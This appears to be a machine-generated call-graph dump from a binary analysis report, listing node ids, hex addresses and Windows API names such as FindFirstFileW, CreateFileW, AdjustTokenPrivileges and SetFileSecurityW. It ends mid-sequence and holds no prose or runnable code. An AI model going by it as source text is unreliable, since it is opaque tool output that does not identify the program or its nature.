32254 fcb8b5 32251->32254 32255 fcb9f4 32252->32255 32256 fcb9e3 strcmp 32252->32256 32312 f72ff8 malloc _CxxThrowException memmove free _CxxThrowException 32254->32312 32295 fcb4d0 32255->32295 32256->32255 32260 fcba32 32256->32260 32263 fcb8e2 32257->32263 32264 f72ecc 3 API calls 32260->32264 32313 f73798 32263->32313 32269 fcba62 32264->32269 32266 fcba1a 32328 f724a8 fflush 32266->32328 32267 fcba26 32271 f72ecc 3 API calls 32267->32271 32273 f73798 4 API calls 32269->32273 32271->32260 32272 fcb8ef 32319 f724e4 32272->32319 32273->32240 32275 fcb9b3 32327 f72ff8 malloc _CxxThrowException memmove free _CxxThrowException 32275->32327 32277 f73798 4 API calls 32280 fcb913 32277->32280 32280->32275 32280->32277 32281 f724e4 10 API calls 32280->32281 32325 f73c68 memmove 32280->32325 32326 f73ec0 6 API calls 32280->32326 32281->32280 32283 fcb586 32282->32283 32284 fcb5ba strlen 32283->32284 32285 fcb5ed 32284->32285 32286 fcb5db 32284->32286 32287 f72fac 5 API calls 32285->32287 32286->32285 32288 f73cec _CxxThrowException 32286->32288 32289 fcb5fb 32287->32289 32288->32286 32289->32244 32289->32247 32291 f72ee0 32290->32291 32293 f72f02 32290->32293 32291->32293 32329 f72350 malloc 32291->32329 32293->32250 32293->32293 32296 fcb540 32295->32296 32299 fcb4ea 32295->32299 32297 fcb551 fputs 32296->32297 32333 f724a8 fflush 32296->32333 32297->32266 32297->32267 32298 fcb4fb 32301 fcb51d fputs 32298->32301 32302 fcb50d memset 32298->32302 32299->32298 32332 f72c70 malloc _CxxThrowException _CxxThrowException free 32299->32332 32301->32296 32302->32301 32305 f73d02 32304->32305 32306 f73cfd 32304->32306 32308 f72fac 32305->32308 32334 f72cf8 _CxxThrowException 32306->32334 32309 f72fc1 32308->32309 32335 f72d4c 32309->32335 32312->32249 32314 f737e4 32313->32314 32315 f737ac 32313->32315 32314->32272 32316 f737cf memmove 32315->32316 32317 f72350 2 API calls 32315->32317 32316->32314 32318 f737be free 32317->32318 32318->32316 32320 f72515 32319->32320 32321 f72508 32319->32321 32343 f74544 9 API calls 32320->32343 32342 f74d00 malloc _CxxThrowException _CxxThrowException free _CxxThrowException 32321->32342 32324 f72513 32324->32280 32325->32280 32326->32280 32327->32252 32328->32267 32330 f72381 free 32329->32330 32331 f7236b _CxxThrowException 32329->32331 32330->32293 32331->32330 32332->32298 32333->32297 32336 f72d98 32335->32336 32337 f72d5d 32335->32337 32336->32248 32338 f72d9d _CxxThrowException 32337->32338 32339 f72d93 32337->32339 32341 f72c2c malloc _CxxThrowException memmove free 32339->32341 32341->32336 32342->32324 32343->32324 32344 fc9dfd 32345 fc9e19 32344->32345 32346 fc9e01 fputs 32344->32346 32501 fbfde4 32345->32501 32500 f724c4 fputc 32346->32500 32500->32345 32502 fbfe02 32501->32502 32503 fbfdf2 32501->32503 32505 f7354c 32502->32505 32571 f72e68 malloc _CxxThrowException free 32503->32571 32506 f72350 2 API calls 32505->32506 32507 f73566 32506->32507 32508 f9c0c8 32507->32508 32572 f99be0 32508->32572 32513 f9c159 32585 f9c044 13 API calls 32513->32585 32515 f9c221 32599 f9c044 13 API calls 32515->32599 32528 f72350 2 API calls 32531 f9c172 32528->32531 32531->32515 32531->32528 32536 f9c1eb free 32531->32536 32586 f98c88 6 API calls 32531->32586 32587 fb5a44 32531->32587 32596 f736a8 32531->32596 32536->32531 32571->32502 32600 f86830 GetCurrentProcess 32572->32600 32575 f9bf1c 32583 f9bf4d 32575->32583 32584 f9bff9 32575->32584 32577 f9c008 32716 f98ecc 176 API calls 32577->32716 32578 f99b28 9 API calls 32578->32583 32580 f9bffb memmove 32580->32513 32580->32531 32583->32578 32583->32584 32610 f9ab24 32583->32610 32715 f98d00 10 API calls 32584->32715 32586->32531 32588 fb5ac0 32587->32588 32589 fb5a57 32587->32589 32588->32531 32590 fb5a7a 32589->32590 32591 fb5a60 _CxxThrowException 32589->32591 32592 f72350 2 API calls 32590->32592 32591->32590 32593 fb5a96 32592->32593 32594 fb5a9f memmove 32593->32594 32595 fb5ab2 free 32593->32595 32594->32595 32595->32588 32597 f73280 2 API calls 32596->32597 32598 f736bd memmove 32597->32598 32598->32531 32601 f86851 CloseHandle 32600->32601 32602 f86867 OpenProcessToken 32600->32602 32601->32602 32603 f868c9 32602->32603 32604 f8687e LookupPrivilegeValueW 32602->32604 32607 f868d9 32603->32607 32608 f868d3 CloseHandle 32603->32608 32604->32603 32605 f868ab AdjustTokenPrivileges 32604->32605 32605->32603 32606 f868dd GetLastError 32605->32606 32606->32607 32609 f868f2 CloseHandle 32606->32609 32607->32575 32608->32607 32609->32607 32611 f9ab71 32610->32611 32717 f98494 32611->32717 32613 f9bd0e free 32613->32580 32613->32583 32614 f9bb53 32752 f99d70 84 API calls 32614->32752 32616 f9bb72 32625 f9bb79 32616->32625 32642 f9bbc0 32616->32642 32617 f9b94b 32750 f79414 15 API calls 32617->32750 32618 f9b84d 32620 f9b8a8 free 32618->32620 32619 f9ab93 32619->32613 32636 f9b8bc 32619->32636 32713 f9abff 32619->32713 32620->32613 32623 f9bd04 free 32623->32613 32624 f9bbbb 32624->32623 32625->32623 32625->32624 32626 f9bba6 free free 32625->32626 32626->32625 32628 f9ba65 32630 f9bac1 32628->32630 32637 f9bb2c free free 32628->32637 32629 f734d0 4 API calls 32675 f9b3c0 32629->32675 32633 f9bb42 free 32630->32633 32631 f9bce9 free free 32632 f9bc58 32631->32632 32632->32624 32632->32631 32633->32613 32634 f736a8 3 API calls 32663 f9b964 32634->32663 32635 f9bc5d 32635->32624 32643 f9bc7a free free 32635->32643 32636->32614 32636->32617 32637->32628 32638 f7354c 2 API calls 32638->32713 32640 f9bac3 free 32640->32630 32646 f9bad8 32640->32646 32641 f7354c 2 API calls 32641->32675 32642->32632 32642->32635 32644 f98494 32 API calls 32642->32644 32648 f9bc94 32642->32648 32753 f9a43c 334 API calls 32642->32753 32643->32635 32644->32642 32646->32630 32647 f9baf1 free free 32646->32647 32647->32646 32648->32624 32656 f9bcb1 free free 32648->32656 32650 f7354c 2 API calls 32650->32663 32652 f73798 4 API calls 32652->32713 32654 f984c8 9 API calls 32654->32675 32655 f9ad48 GetLastError 32655->32713 32656->32648 32657 f73798 4 API calls 32657->32675 32658 f73798 4 API calls 32658->32663 32660 f983ec 102 API calls 32660->32675 32663->32628 32663->32634 32663->32640 32663->32650 32663->32658 32667 f9ba39 free free 32663->32667 32668 f9ba6a free free 32663->32668 32751 f9a43c 334 API calls 32663->32751 32664 f9ad69 free free 32664->32713 32665 f9b3d4 free free 32665->32620 32666 fb5a44 malloc _CxxThrowException _CxxThrowException memmove free 32666->32713 32667->32628 32667->32663 32668->32633 32670 f9ba93 32668->32670 32669 f9b7f0 free 32671 f9b888 free free 32669->32671 32672 f9b802 free free 32669->32672 32670->32630 32679 f9baac free free 32670->32679 32671->32620 32672->32675 32673 f9ade8 free free 32673->32713 32674 f9b3f2 free free 32674->32620 32675->32618 32675->32629 32675->32641 32675->32654 32675->32657 32675->32660 32675->32669 32676 f9b692 free free 32675->32676 32677 f9b6b6 GetLastError 32675->32677 32678 f9b7dc free free 32675->32678 32680 f9b738 free free 32675->32680 32681 f9b86d free free 32675->32681 32682 f9b852 free free 32675->32682 32683 f9b6d6 free free 32675->32683 32747 f736dc malloc _CxxThrowException free 32675->32747 32748 f732b0 _CxxThrowException 32675->32748 32749 f99f08 334 API calls 32675->32749 32676->32675 32677->32675 32678->32675 32679->32670 32680->32675 32681->32620 32682->32620 32683->32675 32685 f9af22 free 32685->32713 32686 f9aeb7 free free free 32686->32713 32687 f9aea2 free free 32687->32713 32688 f9af0c free free 32688->32713 32689 f9b12f free free 32689->32713 32693 f9b410 free free 32693->32620 32695 f9b42e free free 32695->32620 32697 f9affd free free 32697->32713 32699 f9b24c free free free 32699->32713 32700 f9b237 free free 32700->32713 32701 f9b4a5 32702 f9b4e6 free free free 32701->32702 32704 f9b4d1 free free 32701->32704 32702->32620 32703 f9b364 free free free 32703->32713 32704->32701 32705 f9b34f free free 32705->32713 32706 f72350 malloc _CxxThrowException 32706->32713 32707 f736a8 malloc _CxxThrowException memmove 32707->32713 32709 f9b44c 32711 f9b47b free free free 32709->32711 32712 f9b467 free free 32709->32712 32710 f9b10c free 32710->32713 32711->32620 32712->32709 32713->32638 32713->32652 32713->32655 32713->32664 32713->32665 32713->32666 32713->32673 32713->32674 32713->32675 32713->32685 32713->32686 32713->32687 32713->32688 32713->32689 32713->32693 32713->32695 32713->32697 32713->32699 32713->32700 32713->32701 32713->32703 32713->32705 32713->32706 32713->32707 32713->32709 32713->32710 32714 f9b0f3 free free 32713->32714 32721 f734d0 32713->32721 32724 f984c8 32713->32724 32732 f983ec 32713->32732 32737 f736dc malloc _CxxThrowException free 32713->32737 32738 f732b0 _CxxThrowException 32713->32738 32739 f75e24 18 API calls 32713->32739 32740 f987c4 16 API calls 32713->32740 32741 f99a20 7 API calls 32713->32741 32742 f98930 61 API calls 32713->32742 32743 f9a000 95 API calls 32713->32743 32744 f753d0 CharUpperW CharUpperW 32713->32744 32745 f8c850 malloc _CxxThrowException _CxxThrowException memmove free 32713->32745 32746 f99f08 334 API calls 32713->32746 32714->32713 32715->32577 32716->32580 32718 f984a8 32717->32718 32719 f984bc 32717->32719 32754 fbfe08 32718->32754 32719->32619 32760 f73470 32721->32760 32723 f734f8 32723->32713 32725 f736a8 3 API calls 32724->32725 32726 f984e7 32725->32726 32766 f739ac 32726->32766 32728 f984f5 32730 f9850b 32728->32730 32769 f732b0 _CxxThrowException 32728->32769 32731 f9855a free 32730->32731 32731->32713 32777 f788ec 32732->32777 32734 f98459 32734->32713 32737->32713 32739->32713 32740->32713 32741->32713 32742->32713 32743->32713 32744->32713 32745->32713 32746->32713 32747->32675 32749->32675 32750->32663 32751->32663 32752->32616 32753->32642 32755 fbfe18 32754->32755 32756 fbfe46 32754->32756 32757 f73798 4 API calls 32755->32757 32756->32719 32758 fbfe3e 32757->32758 32759 fcb774 32 API calls 32758->32759 32759->32756 32763 f73280 32760->32763 32764 f72350 2 API calls 32763->32764 32765 f7329d memmove memmove 32764->32765 32765->32723 32770 f73304 32766->32770 32771 f73352 memmove 32770->32771 32773 f73315 32770->32773 32771->32728 32772 f73357 _CxxThrowException 32773->32772 32774 f7334b 32773->32774 32776 f731d8 malloc _CxxThrowException memmove free 32774->32776 32776->32771 32778 f78913 32777->32778 32779 f7896f 32778->32779 32780 f78937 32778->32780 32782 f7897f 32779->32782 32785 f78a5f 32779->32785 32781 f73730 4 API calls 32780->32781 32783 f7895e 32781->32783 32784 f73730 4 API calls 32782->32784 32783->32734 32884 f73730 32783->32884 32787 f789aa 32784->32787 32792 f78ce8 32785->32792 32913 f735b8 32785->32913 32786 f78a1e 32907 f79fc4 32786->32907 32787->32786 32789 f789c1 32787->32789 32906 f7bc48 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 32789->32906 32790 f78a8c 32794 f735b8 3 API calls 32790->32794 32796 f78db9 32792->32796 32798 f78d31 32792->32798 32807 f78a9a 32794->32807 32800 f78ff5 32796->32800 32801 f78dcf 32796->32801 32824 f78e36 32796->32824 32797 f78a08 32797->32786 32799 f78a0c 32797->32799 32921 f786c8 32798->32921 32799->32783 32889 f78318 32800->32889 32804 f786c8 48 API calls 32801->32804 32809 f78dd7 32804->32809 32816 f78ae4 32807->32816 32917 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 32807->32917 32809->32800 32814 f78df6 32809->32814 32811 f78d55 32815 f73730 4 API calls 32811->32815 32812 f79041 32903 f782ec 32812->32903 32818 f782ec FindClose 32814->32818 32819 f78d84 32815->32819 32817 f78b44 32816->32817 32821 f78b08 32816->32821 32822 f788ec 84 API calls 32817->32822 32818->32783 32932 f78770 49 API calls 32819->32932 32820 f79023 32936 f78770 49 API calls 32820->32936 32825 f78b42 32821->32825 32830 f73798 4 API calls 32821->32830 32827 f78b54 32822->32827 32824->32800 32933 f78770 49 API calls 32824->32933 32833 f736a8 3 API calls 32825->32833 32827->32825 32832 f78cd3 free free 32827->32832 32828 f7902e 32834 f782ec FindClose 32828->32834 32830->32825 32831 f78da4 32836 f782ec FindClose 32831->32836 32832->32792 32837 f78b7e 32833->32837 32834->32783 32835 f78e71 32838 f78e96 32835->32838 32839 f78e75 32835->32839 32836->32783 32840 f7354c 2 API calls 32837->32840 32843 f735b8 3 API calls 32838->32843 32842 f73730 4 API calls 32839->32842 32841 f78b89 32840->32841 32918 f78680 53 API calls 32841->32918 32845 f78e81 32842->32845 32846 f78ea3 32843->32846 32847 f782ec FindClose 32845->32847 32848 f78eb8 32846->32848 32934 f732b0 _CxxThrowException 32846->32934 32847->32783 32851 f78ee3 32848->32851 32935 f732b0 _CxxThrowException 32848->32935 32849 f78bf5 free free 32855 f782ec FindClose 32849->32855 32853 f78318 48 API calls 32851->32853 32857 f78f1a 32853->32857 32854 f78c25 SetLastError free free 32856 f782ec FindClose 32854->32856 32859 f78c14 free 32855->32859 32860 f78c50 free 32856->32860 32861 f78f6e 32857->32861 32862 f78f1e wcscmp 32857->32862 32863 f78cc2 free 32859->32863 32860->32863 32867 f786c8 48 API calls 32861->32867 32862->32861 32864 f78f3e 32862->32864 32863->32783 32868 f73730 4 API calls 32864->32868 32865 f78bc5 free 32869 f7354c 2 API calls 32865->32869 32866 f78c5e 32871 f739ac 6 API calls 32866->32871 32870 f78f7e 32867->32870 32872 f78f4e free 32868->32872 32873 f78ba1 32869->32873 32874 f78fa7 32870->32874 32875 f78f9b free 32870->32875 32877 f78c89 free free 32871->32877 32878 f782ec FindClose 32872->32878 32873->32849 32873->32854 32873->32865 32873->32866 32919 f728e8 CharUpperW CharUpperW 32873->32919 32920 f78680 53 API calls 32873->32920 32876 f73730 4 API calls 32874->32876 32875->32800 32880 f78fd8 free 32876->32880 32881 f782ec FindClose 32877->32881 32878->32783 32882 f782ec FindClose 32880->32882 32883 f78cb4 free 32881->32883 32882->32783 32883->32863 32886 f73746 32884->32886 32885 f73775 memmove 32885->32734 32886->32885 32887 f72350 2 API calls 32886->32887 32888 f73764 free 32887->32888 32888->32885 32890 f782ec FindClose 32889->32890 32892 f7833b 32890->32892 32891 f783b3 32891->32812 32891->32820 32892->32891 32893 f78363 32892->32893 32894 f78352 FindFirstFileW 32892->32894 32895 f783ad 32893->32895 32897 f7354c 2 API calls 32893->32897 32894->32893 32895->32891 32896 f73730 4 API calls 32895->32896 32896->32891 32898 f78377 32897->32898 32937 f7b8b0 32898->32937 32900 f7838c 32901 f783a3 free 32900->32901 32902 f78390 FindFirstFileW 32900->32902 32901->32895 32902->32901 32904 f78308 32903->32904 32905 f782fb FindClose 32903->32905 32904->32783 32905->32904 32906->32797 33042 f79f10 32907->33042 32910 f7960c 32911 f79628 32910->32911 32912 f7961b CloseHandle 32910->32912 32911->32783 32912->32911 32914 f735cd 32913->32914 32915 f73280 2 API calls 32914->32915 32916 f735e3 memmove 32915->32916 32916->32790 32917->32816 32918->32873 32919->32873 32920->32873 32922 f786e0 32921->32922 32923 f786e7 GetFileAttributesW 32922->32923 32924 f786f5 32922->32924 32923->32924 32925 f78741 32923->32925 32924->32925 32926 f7354c 2 API calls 32924->32926 32925->32800 32925->32811 32927 f78703 32926->32927 32928 f7b8b0 44 API calls 32927->32928 32929 f78718 32928->32929 32930 f78737 free 32929->32930 32931 f7871c GetFileAttributesW free 32929->32931 32930->32925 32931->32925 32932->32831 32933->32835 32936->32828 32942 f7b298 32937->32942 32940 f7b8e0 32940->32900 32941 f73730 4 API calls 32941->32940 32943 f7b2cb 32942->32943 32944 f7b2d2 32942->32944 32943->32940 32943->32941 32944->32943 32945 f7b3d7 32944->32945 32952 f7b300 32944->32952 32946 f7b4cf 32945->32946 32948 f7b3f0 32945->32948 32947 f7b6b8 32946->32947 32949 f7b4e5 32946->32949 32950 f735b8 3 API calls 32947->32950 32948->32949 32953 f7b40d 32948->32953 32951 f7354c 2 API calls 32949->32951 32961 f7b6c6 32950->32961 32954 f7b4ef 32951->32954 32952->32943 32955 f735b8 3 API calls 32952->32955 32956 f735b8 3 API calls 32953->32956 33033 f77564 13 API calls 32954->33033 32958 f7b32f 32955->32958 32959 f7b41a 32956->32959 32967 f7b343 free 32958->32967 32968 f7b352 32958->32968 32964 f735b8 3 API calls 32959->32964 32960 f7b4fa 32962 f7b50f 32960->32962 32963 f7b4fe free 32960->32963 32965 f735b8 3 API calls 32961->32965 33034 f7ab6c _CxxThrowException 32962->33034 32963->32943 32969 f7b446 32964->32969 32970 f7b704 32965->32970 32967->32943 32971 f735b8 3 API calls 32968->32971 33031 f7b04c memmove 32969->33031 33040 f7b04c memmove 32970->33040 32974 f7b360 32971->32974 33030 f7b04c memmove 32974->33030 32975 f7b451 32979 f7b455 free free 32975->32979 32980 f7b471 32975->32980 32976 f7b70f 32981 f7b713 free free 32976->32981 32982 f7b72c 32976->32982 32977 f7b519 32983 f7b52f 32977->32983 32992 f7b54e 32977->32992 32979->32943 33032 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 32980->33032 32981->32943 33041 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 32982->33041 32991 f7b557 32983->32991 32994 f7b53f free 32983->32994 32984 f7b36b 32985 f7b36f free free 32984->32985 32986 f7b38b 32984->32986 32985->32943 32993 f739ac 6 API calls 32986->32993 32989 f7b480 32998 f739ac 6 API calls 32989->32998 32990 f7b73b 32995 f739ac 6 API calls 32990->32995 32996 f7354c 2 API calls 32991->32996 32992->32991 33001 f7b6a9 free 32992->33001 33019 f7b58a 32992->33019 32997 f7b3ad 32993->32997 32994->32943 32999 f7b75d 32995->32999 33000 f7b5d8 32996->33000 33002 f739ac 6 API calls 32997->33002 33003 f7b4a5 32998->33003 33004 f739ac 6 API calls 32999->33004 33005 f7b60b 33000->33005 33009 f7b5e5 33000->33009 33001->32943 33006 f7b3ba free free 33002->33006 33007 f739ac 6 API calls 33003->33007 33008 f7b76a free free 33004->33008 33010 f73730 4 API calls 33005->33010 33006->32943 33011 f7b4b2 free free 33007->33011 33008->32943 33035 f73958 6 API calls 33009->33035 33014 f7b609 33010->33014 33011->32943 33013 f7b5b8 free 33013->32943 33037 f7b04c memmove 33014->33037 33015 f7b5fc 33036 f73958 6 API calls 33015->33036 33018 f7b623 33020 f7b627 free free 33018->33020 33021 f7b643 33018->33021 33019->32991 33019->33013 33020->32943 33022 f7b653 33021->33022 33038 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 33021->33038 33039 f7ab0c malloc _CxxThrowException memmove 33022->33039 33025 f7b668 33026 f739ac 6 API calls 33025->33026 33027 f7b674 free 33026->33027 33028 f739ac 6 API calls 33027->33028 33029 f7b68c free free 33028->33029 33029->32943 33030->32984 33031->32975 33032->32989 33033->32960 33034->32977 33035->33015 33036->33014 33037->33018 33038->33022 33039->33025 33040->32976 33041->32990 33049 f79a94 33042->33049 33045 f79f76 33061 f79cd0 15 API calls 33045->33061 33046 f79f56 SetFileTime 33046->33045 33048 f78a38 33048->32910 33050 f7960c CloseHandle 33049->33050 33051 f79abf 33050->33051 33052 f79aee CreateFileW 33051->33052 33053 f79ac5 33051->33053 33054 f79b12 33051->33054 33052->33054 33053->33045 33053->33046 33054->33053 33055 f7354c 2 API calls 33054->33055 33056 f79b26 33055->33056 33057 f7b8b0 44 API calls 33056->33057 33058 f79b3b 33057->33058 33059 f79b65 free 33058->33059 33060 f79b3f CreateFileW 33058->33060 33059->33053 33060->33059 33061->33048 33097 fa841c 33098 fa8486 33097->33098 33100 fa843c 33097->33100 33099 fa8468 free 33103 f76b80 33099->33103 33100->33098 33100->33099 33104 f76b91 FreeLibrary 33103->33104 33105 f76b9b free 33103->33105 33104->33105 33105->33100 33106 fb3d32 33128 fb2e58 33106->33128 33108 f7354c 2 API calls 33110 fb3d66 33108->33110 33109 fb3d3a 33109->33108 33111 f7354c 2 API calls 33110->33111 33112 fb3d71 33111->33112 33113 fb3dc5 33112->33113 33135 f7768c 33112->33135 33118 fb3df2 free free 33113->33118 33125 fb3e0d 33113->33125 33121 fb3ebf 33118->33121 33119 fb3ea7 free free 33119->33121 33120 fb3daa free free 33120->33121 33122 f734d0 4 API calls 33122->33125 33123 fb5a44 5 API calls 33123->33125 33124 f72350 2 API calls 33124->33125 33125->33119 33125->33122 33125->33123 33125->33124 33126 f736a8 3 API calls 33125->33126 33127 fb3e71 free 33125->33127 33126->33125 33127->33125 33129 f7354c 2 API calls 33128->33129 33130 fb2edc 33129->33130 33131 f7354c 2 API calls 33130->33131 33132 fb2ee9 33131->33132 33133 f7354c 2 API calls 33132->33133 33134 fb2f02 33133->33134 33134->33109 33136 f776a5 33135->33136 33137 f73730 4 API calls 33136->33137 33138 f776b7 33136->33138 33137->33138 33139 f73730 4 API calls 33138->33139 33140 f776d1 33139->33140 33141 f8cf90 33140->33141 33155 f8cc64 33141->33155 33143 f8d004 33145 f73798 4 API calls 33143->33145 33144 f8cfcd 33144->33143 33146 f8cff0 free free 33144->33146 33147 f8d02d 33145->33147 33146->33144 33148 f734d0 4 API calls 33147->33148 33149 f8d03e 33148->33149 33150 f788ec 102 API calls 33149->33150 33151 f8d051 free 33150->33151 33152 f8d069 33151->33152 33153 f8d064 33151->33153 33152->33113 33152->33120 33160 f795e0 GetLastError 33153->33160 33156 f8ccb5 33155->33156 33159 f8cc7b 33155->33159 33156->33144 33157 f8cc92 free 33158 f8cca9 free 33157->33158 33157->33159 33158->33159 33159->33156 33159->33157 33159->33158 33160->33152 33161 fb2732 33162 fb295a 33161->33162 33163 fb273e 33161->33163 33163->33162 33199 faa110 VariantClear 33163->33199 33165 fb27a4 33165->33162 33200 faa110 VariantClear 33165->33200 33167 fb27be 33167->33162 33201 faa110 VariantClear 33167->33201 33169 fb27d8 33169->33162 33202 faa110 VariantClear 33169->33202 33171 fb27f2 33171->33162 33203 faa110 VariantClear 33171->33203 33173 fb280c 33173->33162 33204 faa110 VariantClear 33173->33204 33175 fb2826 33175->33162 33205 f75110 33175->33205 33178 f7354c 2 API calls 33179 fb2848 33178->33179 33180 fb2872 33179->33180 33181 f73730 4 API calls 33179->33181 33182 fb2945 free free 33180->33182 33183 fb28fc 33180->33183 33184 fb28a0 33180->33184 33181->33180 33182->33162 33210 fa7e60 CharUpperW CharUpperW 33183->33210 33185 f7354c 2 API calls 33184->33185 33187 fb28aa 33185->33187 33189 f7354c 2 API calls 33187->33189 33188 fb2909 33211 f983c4 10 API calls 33188->33211 33191 fb28b7 33189->33191 33209 f983c4 10 API calls 33191->33209 33192 fb292d 33194 f73798 4 API calls 33192->33194 33196 fb2939 free 33194->33196 33195 fb28cd 33197 f73798 4 API calls 33195->33197 33196->33182 33198 fb28d9 free free free 33197->33198 33198->33182 33199->33165 33200->33167 33201->33169 33202->33171 33203->33173 33204->33175 33206 f7512d 33205->33206 33207 f735b8 3 API calls 33206->33207 33208 f75140 33207->33208 33208->33178 33209->33195 33210->33188 33211->33192 33212 fcae51 33213 fcaef6 33212->33213 33216 fbfdd4 SetConsoleCtrlHandler 33213->33216 33217 fb3616 33218 fb362c 33217->33218 33308 f9c944 33218->33308 33221 f73798 4 API calls 33222 fb36e4 33221->33222 33223 fb3953 33222->33223 33224 fb3725 33222->33224 33225 f73798 4 API calls 33223->33225 33226 fb372d 33224->33226 33227 fb3a40 free free 33224->33227 33228 fb39b6 33225->33228 33311 fab3b4 33226->33311 33229 f9ca94 7 API calls 33227->33229 33231 f73798 4 API calls 33228->33231 33247 fb3894 33229->33247 33233 fb39c7 33231->33233 33237 f73798 4 API calls 33233->33237 33234 fb3749 33238 fb5a44 5 API calls 33234->33238 33235 fb3aa3 free free 33236 f9ca94 7 API calls 33235->33236 33236->33247 33239 fb39d8 free free 33237->33239 33240 fb3751 33238->33240 33242 f9ca94 7 API calls 33239->33242 33241 f72350 2 API calls 33240->33241 33243 fb375b 33241->33243 33242->33247 33244 fb3775 free free 33243->33244 33320 fab8e4 malloc _CxxThrowException memmove 33243->33320 33317 f9ca94 7 API calls 33244->33317 33251 fb3395 33252 fb339a memmove 33251->33252 33253 fb33b9 memmove 33251->33253 33254 fb33dd memmove 33252->33254 33253->33247 33253->33254 33255 fb33fd 33254->33255 33281 faaec4 33255->33281 33258 f73798 4 API calls 33259 fb3427 33258->33259 33260 f73798 4 API calls 33259->33260 33261 fb3438 33260->33261 33296 fb2a28 33261->33296 33263 fb3453 33264 fb37f8 33263->33264 33265 fb345d 33263->33265 33266 fb3886 33264->33266 33268 f73798 4 API calls 33264->33268 33267 fb5a44 5 API calls 33265->33267 33270 f9ca94 7 API calls 33266->33270 33269 fb3465 33267->33269 33271 fb3864 33268->33271 33272 f72350 2 API calls 33269->33272 33270->33247 33273 f73798 4 API calls 33271->33273 33274 fb346f 33272->33274 33275 fb3875 33273->33275 33276 fb3489 33274->33276 33319 fab8e4 malloc _CxxThrowException memmove 33274->33319 33277 f73798 4 API calls 33275->33277 33279 f9ca94 7 API calls 33276->33279 33277->33266 33280 fb34ae 33279->33280 33282 f7354c 2 API calls 33281->33282 33283 faaf12 33282->33283 33284 f7354c 2 API calls 33283->33284 33285 faaf1c 33284->33285 33286 f7354c 2 API calls 33285->33286 33287 faaf26 33286->33287 33288 f7354c 2 API calls 33287->33288 33289 faaf6e 33288->33289 33290 f7354c 2 API calls 33289->33290 33291 faaf78 33290->33291 33292 f7354c 2 API calls 33291->33292 33293 faafae 33292->33293 33294 f7354c 2 API calls 33293->33294 33295 faafb8 33294->33295 33295->33258 33297 fb2a8f 33296->33297 33298 fb2a55 33296->33298 33300 f72350 2 API calls 33297->33300 33307 fb2a5d 33297->33307 33299 f72350 2 API calls 33298->33299 33299->33307 33301 fb2aa0 33300->33301 33302 f73798 4 API calls 33301->33302 33303 fb2adb 33302->33303 33304 f79fc4 64 API calls 33303->33304 33305 fb2af0 33304->33305 33305->33307 33321 f795e0 GetLastError 33305->33321 33307->33263 33309 f7354c 2 API calls 33308->33309 33310 f9c9c3 memmove 33309->33310 33310->33221 33312 fab419 33311->33312 33316 fab41f 33312->33316 33326 f7bf00 33312->33326 33322 f7be6c 33316->33322 33318 f9cafe memmove 33317->33318 33318->33251 33319->33276 33320->33244 33321->33307 33323 f7be97 33322->33323 33325 f7be78 33322->33325 33323->33234 33323->33235 33324 f7be91 VariantClear 33324->33323 33325->33323 33325->33324 33327 f7bf14 33326->33327 33328 f7bf0a 33326->33328 33330 f7be9c VariantClear 33327->33330 33328->33316 33330->33328 33331 f88a08 33332 f88a2c 33331->33332 33333 f88a6d 33331->33333 33368 fab2cc 33332->33368 33343 f88830 33333->33343 33336 f88b99 33337 fab2cc VariantClear 33336->33337 33338 f88bb9 33336->33338 33337->33338 33339 f88a46 33338->33339 33364 f87b1c 33338->33364 33341 f88ad3 33341->33336 33341->33339 33342 f88b6a SetFileSecurityW 33341->33342 33342->33336 33344 f7354c 2 API calls 33343->33344 33345 f8886f 33344->33345 33346 f888d4 33345->33346 33348 f8889b 33345->33348 33352 f888d0 33345->33352 33405 f86e88 14 API calls 33346->33405 33403 f864e8 25 API calls 33348->33403 33351 f8893d 33354 f889d2 free 33351->33354 33378 f87924 33352->33378 33353 f888b3 33353->33352 33404 f86e88 14 API calls 33353->33404 33354->33341 33357 f8895b 33406 f77474 56 API calls 33357->33406 33359 f88967 33360 f88981 33359->33360 33407 f86e88 14 API calls 33359->33407 33363 f88985 33360->33363 33408 f882c8 218 API calls 33360->33408 33363->33351 33363->33354 33365 f87b76 33364->33365 33366 f87b2c 33364->33366 33365->33339 33366->33365 33428 f86e88 14 API calls 33366->33428 33369 fab319 33368->33369 33370 fab385 33369->33370 33376 fab32a 33369->33376 33377 fab31f 33369->33377 33371 f7be6c VariantClear 33370->33371 33373 fab34b 33371->33373 33372 f7be6c VariantClear 33372->33373 33373->33339 33374 fab34f 33375 f7be6c VariantClear 33374->33375 33375->33373 33376->33374 33376->33377 33377->33372 33379 f87949 33378->33379 33380 f87942 33378->33380 33383 f8798e 33379->33383 33415 f799cc 33379->33415 33380->33351 33380->33357 33384 f879d2 33383->33384 33388 f87a4d 33383->33388 33421 f85f8c 6 API calls 33383->33421 33384->33388 33422 f73504 33384->33422 33387 f87aa8 33410 f7eee4 33387->33410 33388->33387 33409 f79878 SetFileTime 33388->33409 33394 f87a0f 33395 f87a1f 33394->33395 33396 f87a13 33394->33396 33427 f79960 WriteFile 33395->33427 33397 f7960c CloseHandle 33396->33397 33402 f87a1d free 33397->33402 33399 f87a37 33401 f7960c CloseHandle 33399->33401 33401->33402 33402->33388 33403->33353 33404->33352 33405->33352 33406->33359 33407->33360 33408->33363 33409->33387 33411 f7960c CloseHandle 33410->33411 33412 f7eef3 33411->33412 33413 f7ef06 33412->33413 33414 f7eef9 GetLastError 33412->33414 33413->33380 33414->33413 33416 f796f8 5 API calls 33415->33416 33417 f799e7 33416->33417 33418 f799f4 33417->33418 33419 f799f8 SetEndOfFile 33417->33419 33418->33383 33420 f86e88 14 API calls 33418->33420 33419->33418 33420->33383 33421->33384 33423 f7351c 33422->33423 33424 f73470 4 API calls 33423->33424 33425 f73542 33424->33425 33426 f7a030 48 API calls 33425->33426 33426->33394 33427->33399 33428->33365 33429 f86bc8 33430 f86bde 33429->33430 33431 f86be5 33429->33431 33433 fc02dc EnterCriticalSection 33431->33433 33434 fc0315 LeaveCriticalSection 33433->33434 33435 fc0300 33433->33435 33434->33430 33436 fcb774 32 API calls 33435->33436 33436->33434 33437 f8b64c 33438 f8b689 33437->33438 33480 f8649c 33438->33480 33441 f8b7c9 33443 f7be6c VariantClear 33441->33443 33442 f8b7da 33444 f8b7fd 33442->33444 33445 f8b7e9 33442->33445 33472 f8b7d3 33443->33472 